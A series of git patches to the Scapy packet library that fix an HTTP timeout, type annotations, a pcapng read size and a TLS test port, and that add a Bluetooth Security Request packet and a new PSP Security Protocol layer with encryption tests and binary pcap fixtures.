--git a/scapy/main.py b/scapy/main.py index 23ffe8db35b..3706228cf3d 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -985,6 +985,8 @@ def ptpython_configure(repl): cfg.InteractiveShellEmbed.term_title = False cfg.HistoryAccessor.hist_file = conf.histfile cfg.InteractiveShell.banner1 = banner + if conf.verb < 2: + cfg.InteractiveShellEmbed.enable_tip = False # configuration can thus be specified here. _kwargs = {} if conf.interactive_shell == "ptipython": From 611c929975ce953487d4bfc045b971df95876bf9 Mon Sep 17 00:00:00 2001 From: tryger Date: Wed, 28 May 2025 16:51:57 +0200 Subject: [PATCH 1477/1632] Add missing timeout in HTTP_Client request, in sr1() call (#4751) --- scapy/layers/http.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 92caee51663..7642bdbf764 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -905,7 +905,7 @@ def request( while True: # Perform the request. try: - resp = self.sr1(req) + resp = self.sr1(req, timeout=timeout) except Exception: # Socket has died, restart. self._sockinfo = None From 267f99a3eabc3555f332ea439832f431c19d7840 Mon Sep 17 00:00:00 2001 From: Antonio Vazquez Date: Wed, 28 May 2025 18:24:56 +0200 Subject: [PATCH 1478/1632] bluetooth: SM: Add security request packet (#4732) --- scapy/layers/bluetooth.py | 24 +++++++++++++++--------- test/scapy/layers/bluetooth.uts | 6 ++++++ 2 files changed, 21 insertions(+), 9 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 7d7208e679b..fb939b3e4d4 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -919,6 +919,11 @@ class SM_Signing_Information(Packet): fields_desc = [StrFixedLenField("csrk", b'\x00' * 16, 16), ] +class SM_Security_Request(Packet): + name = "Security Request" + fields_desc = [BitField("auth_req", 0, 8), ] + + class SM_Public_Key(Packet): name = "Public Key" fields_desc = [StrFixedLenField("key_x", b'\x00' * 32, 32), @@ -2813,16 +2818,17 @@ class HCI_LE_Meta_Extended_Advertising_Reports(Packet): bind_layers(ATT_Hdr, ATT_Handle_Value_Notification, opcode=0x1b) bind_layers(ATT_Hdr, ATT_Handle_Value_Indication, opcode=0x1d) bind_layers(L2CAP_Hdr, SM_Hdr, cid=6) -bind_layers(SM_Hdr, SM_Pairing_Request, sm_command=1) -bind_layers(SM_Hdr, SM_Pairing_Response, sm_command=2) -bind_layers(SM_Hdr, SM_Confirm, sm_command=3) -bind_layers(SM_Hdr, SM_Random, sm_command=4) -bind_layers(SM_Hdr, SM_Failed, sm_command=5) -bind_layers(SM_Hdr, SM_Encryption_Information, sm_command=6) -bind_layers(SM_Hdr, SM_Master_Identification, sm_command=7) -bind_layers(SM_Hdr, SM_Identity_Information, sm_command=8) -bind_layers(SM_Hdr, SM_Identity_Address_Information, sm_command=9) +bind_layers(SM_Hdr, SM_Pairing_Request, sm_command=0x01) +bind_layers(SM_Hdr, SM_Pairing_Response, sm_command=0x02) +bind_layers(SM_Hdr, SM_Confirm, sm_command=0x03) +bind_layers(SM_Hdr, SM_Random, sm_command=0x04) +bind_layers(SM_Hdr, SM_Failed, sm_command=0x05) +bind_layers(SM_Hdr, SM_Encryption_Information, sm_command=0x06) +bind_layers(SM_Hdr, SM_Master_Identification, sm_command=0x07) +bind_layers(SM_Hdr, SM_Identity_Information, sm_command=0x08) +bind_layers(SM_Hdr, SM_Identity_Address_Information, sm_command=0x09) bind_layers(SM_Hdr, SM_Signing_Information, sm_command=0x0a) +bind_layers(SM_Hdr, SM_Security_Request, sm_command=0x0b) bind_layers(SM_Hdr, SM_Public_Key, sm_command=0x0c) bind_layers(SM_Hdr, SM_DHKey_Check, sm_command=0x0d) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 7ca5c7ca264..0d67222e63d 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -791,6 +791,12 @@ pkt.handles[0].value == b'\x02\x03\x00\x00*' pkt.handles[1].value == b'\x02\x05\x00\x01*' pkt.handles[2].value == b'\x02\x07\x00\x04*' += SM_Security_Request +pkt = HCI_Hdr(hex_bytes('0200260600020006000b0d')) +assert SM_Security_Request in pkt +assert pkt[SM_Security_Request].auth_req == 0x0d + + = SM_Public_Key() tests r = raw(SM_Hdr()/SM_Public_Key(key_x="sca", key_y="py")) From 65843d0a7b1d489e78089528e89bc100c7f3ff1b Mon Sep 17 00:00:00 2001 From: marci07iq Date: Thu, 29 May 2025 13:59:02 +0100 Subject: [PATCH 1479/1632] Type annotation bugfixes (#4740) * Fix type of new Packet, annotate enums * Revent Packet, fix Enum annotation * Factor enum type into alias --- scapy/arch/linux/rtnetlink.py | 6 +-- scapy/fields.py | 89 +++++++++++++++++++++++++---------- 2 files changed, 68 insertions(+), 27 deletions(-) diff --git a/scapy/arch/linux/rtnetlink.py b/scapy/arch/linux/rtnetlink.py index e57d2459c8c..d5d267df10a 100644 --- a/scapy/arch/linux/rtnetlink.py +++ b/scapy/arch/linux/rtnetlink.py @@ -394,7 +394,7 @@ def default_payload_class(self, payload: bytes) -> Type[Packet]: class ifinfomsg(Packet): fields_desc = [ - ByteEnumField("ifi_family", 0, socket.AddressFamily), # type: ignore + ByteEnumField("ifi_family", 0, socket.AddressFamily), ByteField("res", 0), Field("ifi_type", 0, fmt="=H"), Field("ifi_index", 0, fmt="=i"), @@ -483,7 +483,7 @@ def default_payload_class(self, payload: bytes) -> Type[Packet]: class ifaddrmsg(Packet): fields_desc = [ - ByteEnumField("ifa_family", 0, socket.AddressFamily), # type: ignore + ByteEnumField("ifa_family", 0, socket.AddressFamily), ByteField("ifa_prefixlen", 0), FlagsField( "ifa_flags", @@ -607,7 +607,7 @@ def default_payload_class(self, payload: bytes) -> Type[Packet]: class rtmsg(Packet): fields_desc = [ - ByteEnumField("rtm_family", 0, socket.AddressFamily), # type: ignore + ByteEnumField("rtm_family", 0, socket.AddressFamily), ByteField("rtm_dst_len", 0), ByteField("rtm_src_len", 0), ByteField("rtm_tos", 0), diff --git a/scapy/fields.py b/scapy/fields.py index 3f423b90e70..56e280b25c5 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1637,7 +1637,7 @@ def __init__( pkt_cls=None, # type: Optional[Union[Callable[[bytes], Packet], Type[Packet]]] # noqa: E501 count_from=None, # type: Optional[Callable[[Packet], int]] length_from=None, # type: Optional[Callable[[Packet], int]] - next_cls_cb=None, # type: Optional[Callable[[Packet, List[BasePacket], Optional[Packet], bytes], Type[Packet]]] # noqa: E501 + next_cls_cb=None, # type: Optional[Callable[[Packet, List[BasePacket], Optional[Packet], bytes], Optional[Type[Packet]]]] # noqa: E501 max_count=None, # type: Optional[int] ): # type: (...) -> None @@ -2514,11 +2514,14 @@ def i2repr(self, pkt, x): return lhex(self.i2h(pkt, x)) +_EnumType = Union[Dict[I, str], Dict[str, I], List[str], DADict[I, str], Type[Enum], Tuple[Callable[[I], str], Callable[[str], I]]] # noqa: E501 + + class _EnumField(Field[Union[List[I], I], I]): def __init__(self, name, # type: str default, # type: Optional[I] - enum, # type: Union[Dict[I, str], Dict[str, I], List[str], DADict[I, str], Type[Enum], Tuple[Callable[[I], str], Callable[[str], I]]] # noqa: E501 + enum, # type: _EnumType[I] fmt="H", # type: str ): # type: (...) -> None @@ -2647,7 +2650,7 @@ class CharEnumField(EnumField[str]): def __init__(self, name, # type: str default, # type: str - enum, # type: Union[Dict[str, str], Tuple[Callable[[str], str], Callable[[str], str]]] # noqa: E501 + enum, # type: _EnumType[str] fmt="1s", # type: str ): # type: (...) -> None @@ -2670,8 +2673,14 @@ def any2i_one(self, pkt, x): class BitEnumField(_BitField[Union[List[int], int]], _EnumField[int]): __slots__ = EnumField.__slots__ - def __init__(self, name, default, size, enum, **kwargs): - # type: (str, Optional[int], int, Dict[int, str], **Any) -> None + def __init__(self, + name, # type: str + default, # type: Optional[int] + size, # type: int + enum, # type: _EnumType[int] + **kwargs # type: Any + ): + # type: (...) -> None _EnumField.__init__(self, name, default, enum) _BitField.__init__(self, name, default, size, **kwargs) @@ -2694,7 +2703,7 @@ def __init__(self, name, # type: str default, # type: Optional[int] length_from, # type: Callable[[Packet], int] - enum, # type: Dict[int, str] + enum, # type: _EnumType[int] **kwargs, # type: Any ): # type: (...) -> None @@ -2718,34 +2727,50 @@ class ShortEnumField(EnumField[int]): def __init__(self, name, # type: str - default, # type: int - enum, # type: Union[Dict[int, str], Dict[str, int], Tuple[Callable[[int], str], Callable[[str], int]], DADict[int, str]] # noqa: E501 + default, # type: Optional[int] + enum, # type: _EnumType[int] ): # type: (...) -> None super(ShortEnumField, self).__init__(name, default, enum, "H") class LEShortEnumField(EnumField[int]): - def __init__(self, name, default, enum): - # type: (str, int, Union[Dict[int, str], List[str]]) -> None + def __init__(self, + name, # type: str + default, # type: Optional[int] + enum, # type: _EnumType[int] + ): + # type: (...) -> None super(LEShortEnumField, self).__init__(name, default, enum, " None + def __init__(self, + name, # type: str + default, # type: Optional[int] + enum, # type: _EnumType[int] + ): + # type: (...) -> None super(LongEnumField, self).__init__(name, default, enum, "Q") class LELongEnumField(EnumField[int]): - def __init__(self, name, default, enum): - # type: (str, int, Union[Dict[int, str], List[str]]) -> None + def __init__(self, + name, # type: str + default, # type: Optional[int] + enum, # type: _EnumType[int] + ): + # type: (...) -> None super(LELongEnumField, self).__init__(name, default, enum, " None + def __init__(self, + name, # type: str + default, # type: Optional[int] + enum, # type: _EnumType[int] + ): + # type: (...) -> None super(ByteEnumField, self).__init__(name, default, enum, "B") @@ -2766,20 +2791,32 @@ def i2repr_one(self, pkt, x): class IntEnumField(EnumField[int]): - def __init__(self, name, default, enum): - # type: (str, Optional[int], Dict[int, str]) -> None + def __init__(self, + name, # type: str + default, # type: Optional[int] + enum, # type: _EnumType[int] + ): + # type: (...) -> None super(IntEnumField, self).__init__(name, default, enum, "I") class SignedIntEnumField(EnumField[int]): - def __init__(self, name, default, enum): - # type: (str, Optional[int], Dict[int, str]) -> None + def __init__(self, + name, # type: str + default, # type: Optional[int] + enum, # type: _EnumType[int] + ): + # type: (...) -> None super(SignedIntEnumField, self).__init__(name, default, enum, "i") class LEIntEnumField(EnumField[int]): - def __init__(self, name, default, enum): - # type: (str, int, Dict[int, str]) -> None + def __init__(self, + name, # type: str + default, # type: Optional[int] + enum, # type: _EnumType[int] + ): + # type: (...) -> None super(LEIntEnumField, self).__init__(name, default, enum, " None + def __init__(self, + name, # type: str + default, # type: Optional[int] + enum, # type: _EnumType[int] + ): + # type: (...) -> None _EnumField.__init__(self, name, default, enum) LEThreeBytesField.__init__(self, name, default) From 8ceee517a122cae1dcacc6c6519984fd3e98f253 Mon Sep 17 00:00:00 2001 From: kruschen Date: Thu, 29 May 2025 15:40:30 +0200 Subject: [PATCH 1480/1632] Update utils.py to forward size parameter in RawPcapnpReader (#4721) I found this little flaw when reading packages from a pcap that was captured on a different device. This fixed the issue of raw data being truncated. If there is a good reason to ignore the size in here lmk --- scapy/utils.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index c86b09cbf72..c9d673c9244 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1786,7 +1786,7 @@ def _read_packet(self, size=MTU): # type: ignore """ while True: - res = self._read_block() + res = self._read_block(size=size) if res is not None: return res From 606395244462fd0a9a8e43c974e7f432ca1462cd Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 29 May 2025 16:33:45 +0200 Subject: [PATCH 1481/1632] Pick available port (#4752) --- test/scapy/layers/tls/tlsclientserver.uts | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/test/scapy/layers/tls/tlsclientserver.uts b/test/scapy/layers/tls/tlsclientserver.uts index dedaba5def0..5f1885e9d06 100644 --- a/test/scapy/layers/tls/tlsclientserver.uts +++ b/test/scapy/layers/tls/tlsclientserver.uts @@ -460,6 +460,7 @@ def run_tls_native_test_server(post_handshake_auth=False, context.verify_mode = ssl.CERT_REQUIRED context.load_cert_chain(certfile=certfile, keyfile=keyfile) + port = [None] lock = threading.Lock() lock.acquire() @@ -467,8 +468,9 @@ def run_tls_native_test_server(post_handshake_auth=False, server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server.settimeout(1) server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - server.bind(("0.0.0.0", 59000)) + server.bind(("0.0.0.0", 0)) server.listen(5) + port[0] = server.getsockname()[1] # Sync lock.release() # Accept socket @@ -498,12 +500,12 @@ def run_tls_native_test_server(post_handshake_auth=False, server = threading.Thread(target=ssl_server) server.start() assert lock.acquire(timeout=5), "Server failed to start in time !" - return server + return server, port[0] def test_tls_client_native(post_handshake_auth=False, with_hello_retry=False): - server = run_tls_native_test_server( + server, port = run_tls_native_test_server( post_handshake_auth=post_handshake_auth, with_hello_retry=with_hello_retry, ) @@ -511,7 +513,7 @@ def test_tls_client_native(post_handshake_auth=False, a = TLSClientAutomaton.tlslink( HTTP, server="127.0.0.1", - dport=59000, + dport=port, version="tls13", mycert=certfile, mykey=keyfile, From 15c632d0db02372cb8c76ba546fd136d440eb197 Mon Sep 17 00:00:00 2001 From: Eyal Itkin Date: Thu, 29 May 2025 17:39:23 +0300 Subject: [PATCH 1482/1632] [psp] Add support for the PSP protocol (#4678) PSP stands for PSP Security Protocol, and is a lightweight IPSec-Like implementation that was released by Google and is getting traction within data centers. This commit adds support for versions 0 & 1 of the protocol which use AES-GCM in 128 and 265 bits. Support was tested against the testing tool of the RFC which generated the same PCAPs that are now used for unit testing. Signed-off-by: Eyal Itkin --- scapy/contrib/psp.py | 189 ++++++++++++++++++ test/contrib/psp.uts | 86 ++++++++ test/pcaps/psp_v4_cleartext.pcap.gz | Bin 0 -> 391 bytes ...v4_encrypt_transport_crypt_off_128.pcap.gz | Bin 0 -> 1581 bytes ...encrypt_transport_crypt_off_128_vc.pcap.gz | Bin 0 -> 1592 bytes ...v4_encrypt_transport_crypt_off_256.pcap.gz | Bin 0 -> 1581 bytes 6 files changed, 275 insertions(+) create mode 100644 scapy/contrib/psp.py create mode 100644 test/contrib/psp.uts create mode 100644 test/pcaps/psp_v4_cleartext.pcap.gz create mode 100644 test/pcaps/psp_v4_encrypt_transport_crypt_off_128.pcap.gz create mode 100644 test/pcaps/psp_v4_encrypt_transport_crypt_off_128_vc.pcap.gz create mode 100644 test/pcaps/psp_v4_encrypt_transport_crypt_off_256.pcap.gz diff --git a/scapy/contrib/psp.py b/scapy/contrib/psp.py new file mode 100644 index 00000000000..ded095ed4ee --- /dev/null +++ b/scapy/contrib/psp.py @@ -0,0 +1,189 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) 2025 + +# scapy.contrib.description = PSP Security Protocol +# scapy.contrib.status = loads + +r""" +PSP layer +========= + +Example of use: + +>>> payload = IP() / UDP(sport=1234, dport=5678) / Raw("A" * 9) +>>> iv = b'\x01\x02\x03\x04\x05\x06\x07\x08' +>>> spi = 0x11223344 +>>> key = b'\xFF\xEE\xDD\xCC\xBB\xAA\x99\x88\x77\x66\x55\x44\x33\x22\x11\x00' +>>> psp_packet = PSP(nexthdr=4, cryptoffset=5, spi=spi, iv=iv, data=payload) +>>> hexdump(psp_packet) +0000 04 01 05 01 11 22 33 44 01 02 03 04 05 06 07 08 ....."3D........ +0010 45 00 00 25 00 01 00 00 40 11 7C C5 7F 00 00 01 E..%....@.|..... +0020 7F 00 00 01 04 D2 16 2E 00 11 A0 C4 41 41 41 41 ............AAAA +0030 41 41 41 41 41 AAAAA +>>> +>>> psp_packet.encrypt(key) +>>> hexdump(psp_packet) +0000 04 01 05 01 11 22 33 44 01 02 03 04 05 06 07 08 ....."3D........ +0010 45 00 00 25 00 01 00 00 40 11 7C C5 7F 00 00 01 E..%....@.|..... +0020 7F 00 00 01 8E 3E 2B 13 45 C7 6B F9 5C DA C3 9B .....>+.E.k.\... +0030 86 17 62 A0 CF DF FB BE BB C6 31 3A 2B 9D E0 64 ..b.......1:+..d +0040 75 9C DD 71 C9 u..q. +>>> +>>> psp_packet.decrypt(key) +>>> hexdump(psp_packet) +0000 04 01 05 01 11 22 33 44 01 02 03 04 05 06 07 08 ....."3D........ +0010 45 00 00 25 00 01 00 00 40 11 7C C5 7F 00 00 01 E..%....@.|..... +0020 7F 00 00 01 04 D2 16 2E 00 11 A0 C4 41 41 41 41 ............AAAA +0030 41 41 41 41 41 AAAAA +>>> + +""" + +from scapy.config import conf +from scapy.error import log_loading +from scapy.fields import ( + BitField, + ByteField, + ConditionalField, + XIntField, + XStrField, + StrFixedLenField, +) +from scapy.packet import ( + Packet, + bind_bottom_up, + bind_top_down, +) +from scapy.layers.inet import UDP + +############################################################################### +if conf.crypto_valid: + from cryptography.exceptions import InvalidTag + from cryptography.hazmat.primitives.ciphers import ( + aead, + ) +else: + log_loading.info("Can't import python-cryptography v1.7+. " + "Disabled PSP encryption/authentication.") + +############################################################################### +import struct + + +class PSP(Packet): + """ + PSP Security Protocol + + See https://github.com/google/psp/blob/main/doc/PSP_Arch_Spec.pdf + """ + name = 'PSP' + + fields_desc = [ + ByteField('nexthdr', 0), + ByteField('hdrextlen', 1), + BitField("reserved", 0, 2), + BitField("cryptoffset", 0, 6), + BitField("sample", 0, 1), + BitField("drop", 0, 1), + BitField("version", 0, 4), + BitField("is_virt", 0, 1), + BitField("one_bit", 1, 1), + XIntField('spi', 0x00), + StrFixedLenField('iv', '\x00' * 8, 8), + ConditionalField(XIntField("virtkey", 0x00), lambda pkt: pkt.is_virt == 1), + ConditionalField(XIntField("sectoken", 0x00), lambda pkt: pkt.is_virt == 1), + XStrField('data', None), + ] + + def sanitize_cipher(self): + """ + Ensure we support the cipher to encrypt/decrypt this packet + + :returns: the supported cipher suite + :raise scapy.layers.psp.PSPCipherError: if the requested cipher + is unsupported + """ + if self.version not in (0, 1): + raise PSPCipherError('Can not encrypt/decrypt using unsupported version %s' + % (self.version)) + return aead.AESGCM + + def encrypt(self, key): + """ + Encrypt a PSP packet + + :param key: the secret key used for encryption + :raise scapy.layers.psp.PSPCipherError: if the requested cipher + is unsupported + """ + cipher = self.sanitize_cipher() + encrypt_start_offset = 16 + self.cryptoffset * 4 + iv = struct.pack("!L", self.spi) + self.iv + plain = b'' + to_encrypt = bytes(self.data) + self.data = b'' + psp_header = bytes(self) + header_length = len(psp_header) + # Header should always be fully plaintext + if header_length < encrypt_start_offset: + plain = to_encrypt[:encrypt_start_offset - header_length] + to_encrypt = to_encrypt[encrypt_start_offset - header_length:] + cipher = cipher(key) + payload = cipher.encrypt(iv, to_encrypt, psp_header + plain) + self.data = plain + payload + + def decrypt(self, key): + """ + Decrypt a PSP packet + + :param key: the secret key used for encryption + :raise scapy.layers.psp.PSPIntegrityError: if the integrity check + fails with an AEAD algorithm + :raise scapy.layers.psp.PSPCipherError: if the requested cipher + is unsupported + """ + cipher = self.sanitize_cipher() + self.icv_size = 16 + iv = struct.pack("!L", self.spi) + self.iv + data = self.data[:len(self.data) - self.icv_size] + icv = self.data[len(self.data) - self.icv_size:] + + decrypt_start_offset = 16 + self.cryptoffset * 4 + plain = b'' + to_decrypt = bytes(data) + self.data = b'' + psp_header = bytes(self) + header_length = len(psp_header) + # Header should always be fully plaintext + if header_length < decrypt_start_offset: + plain = to_decrypt[:decrypt_start_offset - header_length] + to_decrypt = to_decrypt[decrypt_start_offset - header_length:] + cipher = cipher(key) + try: + data = cipher.decrypt(iv, to_decrypt + icv, psp_header + plain) + self.data = plain + data + except InvalidTag as err: + raise PSPIntegrityError(err) + + +bind_bottom_up(UDP, PSP, dport=1000) +bind_bottom_up(UDP, PSP, sport=1000) +bind_top_down(UDP, PSP, dport=1000, sport=1000) + +############################################################################### + + +class PSPCipherError(Exception): + """ + Error risen when the cipher is unsupported. + """ + pass + + +class PSPIntegrityError(Exception): + """ + Error risen when the integrity check fails. + """ + pass diff --git a/test/contrib/psp.uts b/test/contrib/psp.uts new file mode 100644 index 00000000000..8d28cd73936 --- /dev/null +++ b/test/contrib/psp.uts @@ -0,0 +1,86 @@ +# PSP unit tests +# run with: +# test/run_tests -P "load_contrib('psp')" -t test/contrib/psp.uts -F + +% Regression tests for the PSP layer + +############### +##### PSP ##### +############### + ++ PSP tests + += PSP layer + +example_plain_packet = import_hexcap('''\ +0000 04 01 05 01 11 22 33 44 01 02 03 04 05 06 07 08 ....."3D........ +0010 45 00 00 25 00 01 00 00 40 11 7C C5 7F 00 00 01 E..%....@.|..... +0020 7F 00 00 01 04 D2 16 2E 00 11 A0 C4 41 41 41 41 ............AAAA +0030 41 41 41 41 41 AAAAA +''') +psp_packet = PSP(example_plain_packet) +assert psp_packet.nexthdr == 4 +assert psp_packet.hdrextlen == 1 +assert psp_packet.cryptoffset == 5 +assert psp_packet.version == 0 +assert psp_packet.spi == 0x11223344 +assert psp_packet.iv == b'\x01\x02\x03\x04\x05\x06\x07\x08' + +payload = IP(psp_packet.data) +assert payload[UDP].sport == 1234 +assert payload[UDP].dport == 5678 +assert bytes(payload[Raw]) == b"A" * 9 + += PSP Usage Example + +payload = IP() / UDP(sport=1234, dport=5678) / Raw("A" * 9) +iv = b'\x01\x02\x03\x04\x05\x06\x07\x08' +spi = 0x11223344 +key = b'\xFF\xEE\xDD\xCC\xBB\xAA\x99\x88\x77\x66\x55\x44\x33\x22\x11\x00' +psp_packet = PSP(nexthdr=4, cryptoffset=5, spi=spi, iv=iv, data=payload) +hexdump(psp_packet) +expected_orig_packet = import_hexcap(r'''\ +0000 04 01 05 01 11 22 33 44 01 02 03 04 05 06 07 08 ....."3D........ +0010 45 00 00 25 00 01 00 00 40 11 7C C5 7F 00 00 01 E..%....@.|..... +0020 7F 00 00 01 04 D2 16 2E 00 11 A0 C4 41 41 41 41 ............AAAA +0030 41 41 41 41 41 AAAAA +''') +assert bytes(psp_packet) == bytes(expected_orig_packet) +# Now let's encrypt it +psp_packet.encrypt(key) +hexdump(psp_packet) +assert bytes(psp_packet) == import_hexcap(r'''\ +0000 04 01 05 01 11 22 33 44 01 02 03 04 05 06 07 08 ....."3D........ +0010 45 00 00 25 00 01 00 00 40 11 7C C5 7F 00 00 01 E..%....@.|..... +0020 7F 00 00 01 8E 3E 2B 13 45 C7 6B F9 5C DA C3 9B .....>+.E.k.\... +0030 86 17 62 A0 CF DF FB BE BB C6 31 3A 2B 9D E0 64 ..b.......1:+..d +0040 75 9C DD 71 C9 u..q. +''') +# Now let's decrypt it back +psp_packet.decrypt(key) +hexdump(psp_packet) +assert bytes(psp_packet) == bytes(expected_orig_packet) + += PSP RFC Test - Version 0, no VC +key_128 = b'\x39\x46\xDA\x25\x54\xEA\xE4\x6A\xD1\xEF\x77\xA6\x43\x72\xED\xC4' +spi = 0x9A345678 +IV = b'\x00\x00\x00\x00\x00\x00\x00\x01' +plaintext_packet = rdpcap(scapy_path("/test/pcaps/psp_v4_cleartext.pcap.gz"))[0] +encrypted_packet = rdpcap(scapy_path("/test/pcaps/psp_v4_encrypt_transport_crypt_off_128.pcap.gz"))[0] +psp_packet = PSP(nexthdr=0x11, cryptoffset=1, spi=spi, iv=IV, data=plaintext_packet[UDP]) +psp_packet.encrypt(key_128) +assert bytes(psp_packet) == bytes(encrypted_packet[PSP]) + += PSP RFC Test - Version 1, no VC +key_256 = b'\xFA\x00\xF6\x09\xDF\x60\x20\x28\x9A\x1C\x93\xD6\x02\x70\x81\xA6\x37\xAD\x45\xB2\x4A\x55\x76\xB3\x6E\x6F\x49\xDD\x43\x11\x4D\x80' +# SPI and IV are the same as before +encrypted_packet = rdpcap(scapy_path("/test/pcaps/psp_v4_encrypt_transport_crypt_off_256.pcap.gz"))[0] +psp_packet = PSP(nexthdr=0x11, cryptoffset=1, version=1, spi=spi, iv=IV, data=plaintext_packet[UDP]) +psp_packet.encrypt(key_256) +assert bytes(psp_packet) == bytes(encrypted_packet[PSP]) + += PSP RFC Test - Version 0, with VC +encrypted_packet = rdpcap(scapy_path("/test/pcaps/psp_v4_encrypt_transport_crypt_off_128_vc.pcap.gz"))[0] +psp_packet = PSP(nexthdr=0x11, hdrextlen=2, cryptoffset=3, is_virt=1, spi=spi, iv=IV, data=plaintext_packet[UDP]) +psp_packet.encrypt(key_128) +assert bytes(psp_packet) == bytes(encrypted_packet[PSP]) diff --git a/test/pcaps/psp_v4_cleartext.pcap.gz b/test/pcaps/psp_v4_cleartext.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..c1ea14c28273e886fc7ef6245781c32b70e8c72f GIT binary patch literal 391 zcmV;20eJo&iwFqBD>rBW18{S2Uv@NKV{Bz%a&%>QbS`jXVQ>Jua(L51CI%J;7?{P% zz`zKkIfadqlp}e-d=O^nn7L{<1A~&WODF>egDV4T4+Db(gM*-AJQq*{5Ho3~hn-`s z=(J{FWMXDvWn<^yMC+6cQE@6%&_`l#-T_m6KOcR8m$^Ra4i{)Y8_`)zddH zG%_|ZH8Z!cw6eCbwX=6{baHlab#wRd^z!!c_45x13RUz zF>}`JIdkXDU$Ah|;w4L$Enl&6)#^2C*R9{Mant54TeofBv2)k%J$v`VJCq9{>%I?*GCC003rBW18{S2Uv@NKWo~0~d2n=JbaG*Cb8v5RbYEj~d2n=JZ)Rp+ zF)}zVaARR`00HU+75db}vY`S11ONa400000001^400031000RSGGZfH3;@Cf006=T z0001pnX0=003tI)RR9P8MF0h~002M$KoKD~3IG5B3IG5CeW?TJ1)u-`5di@Knlx5; z0000000001D`!^DY=fa#kZ*34AOzC&#V4!!z)Ge!s)K*e`SlQi6QCuC%=L`_SE?sU zSD$%KuNe$e4`u5Klc?i8F_JsUtcY}Zdy#dyTcTtLEXJECxx*E=IDT`BmyL`ZYrQX? za6tzS7PvN2(a79;p0eW)u5-7%{p+3>ngSo9s@)=f3ghwncxkd2At7`@OL(~ELn=u1 zp;*qAME}U&(%mDkj-Itl- zgXG9j5ZLN=DsMm!J^4%e(t!!P0KrVY_saVw4K&X&BVLz zW4A#P-VDBPnan;FahbjBmiLV&3g_f z=RvF{L%whH#DTDO?w%HOpf(QzZF9c>SDIrUhPASF9w*F_e^xNsWb!qd$y5XME(_pg z`>*KGS*asX2r#}ZO!G)D%L9;dpTya zf3mkl+>s!SUT4zYq zOyDIyh{&LfVHfCjG=5A_p-T-bz~jVO*LbMDf&gzcoFH)iHa}13q$zc1sS$WxOG@V|D((3dSdC!I$ zEUj)a)@`8bxzr%OvdE!m%NA~p3~*cfJ~42vA0_Hh7;^#fHcs_1VVw&t^x3F^0(xi_ z=>ocUrR=)y{R7}2ac1nztqpe~B>)nWQl`D7TvC0@*&h(NazRkFS1mI z31|bTJQiiRu7Bz(wfHOCnawASrI4-YQm2@jbrVg%9`pc-+<;>0v(7J3TE;qQk2FUv zW1P>iU)_`9ND_|W^3uhYUjX`T3W4UN!MBE?O}oA2&A)oeaqrgH`64;zZ1RIf3e-Pw zMv6d^q8*R8RX3{g6^j42BGVp~MjneV2fP>e?H!eP!QO)Var;~;?hvyDG=g9N8%z1c z>?$Nck*_aJQUL`V>+33FC((k^1hV!MxTsR1RFe)IfDKOKGU=G*M2A17zWX%_;wa(PfU3yoH2??Go!B-?J@gjRNmh7HN~;JGBEK!V zeD!+ameAm8P&H2oV&+b-_j$a~=*b|nm~fs_r$Ik##SP^#cx#I~qMCeoUO2~GDkt-l zpD4<=qc9)nIDD*SFh_R literal 0 HcmV?d00001 diff --git a/test/pcaps/psp_v4_encrypt_transport_crypt_off_128_vc.pcap.gz b/test/pcaps/psp_v4_encrypt_transport_crypt_off_128_vc.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..648ee4630ced3211d48314b1400058da2d58d55b GIT binary patch literal 1592 zcmV-82FLjyiwFqBD>rBW18{S2Uv@NKWo~0~d2n=JbaG*Cb8v5RbYEj~d2n=JZ)Rp+ zF)}z`c4IDZV_|Rr0rCY6`qaa+p#lH|000000000005&540096100|Q^Vk21$0Lldb z0Lldb004-Ys=ELHA~Qr)00;m@00q1N06+jh5g{)M0003B0007gsRQT*r~m*F0s{k@ zG*);30000000031000000000hXI9Q^gP~ZEZ*G+!1k&}zC#(9vN~SlegMZKY^$>v* zpe2aR^^E^lswYZUpLtHN84OboW$Ou(sN+2`k~_()h;(^-k#)ISqGSjx#+xX)!xgtU zeshbLjf@;?y)T|{K?e>NxHeMJ$lQCLvf~e~bGN+x>z){z0w1EP-6DPpK1p4_lJc*{AgEd($|se&>7-;LBA_uoWxDk!y)g`xC34Yp zfZHql0V*>a6or1{SjByv^G>tR0H%b3*cq@ujtTOsUuM1t-VsWMtuvl);2Axwqb%x7m`;g%Kll};2{g?bBe%i z&E?H1)+-!)IcBqevbROtkt9Y8YlSoNK1Rp1%JsRaT{oye^!n5lZH8nt zonD91>hu(O&xRW;t!^>aZJ_G8)F8gH$f0P<7H*9Ua9jI6F>tOQCF)Taa{=)-PW3Ti zoeM4W*{Fd6dT15t0=jpl?7Hs#1K=QWX6((a4R<0X01}f@roHEwR@;;Ag=8HT-L75o zA=Fw(=m+&LvQ&l%XalG`7G=1uf9fi=_$%C*%_ohekge!ar&a#ivPDF(;k&Z9*ZvrychTF9hG>&-h%sa`&=pR z5VHj|f?xm}OZmm@DkMOWuP;qf0RndU=(Sp(hvi1|Ws8XU-lMm;Eg&4Ly>d~sn zV|fQ2M`O^&UxIA%qDqHrWH$4Z*##-+ND+f{!LRD_?f8*3fP6Jn;%OFSh>AZ0dBJ%? 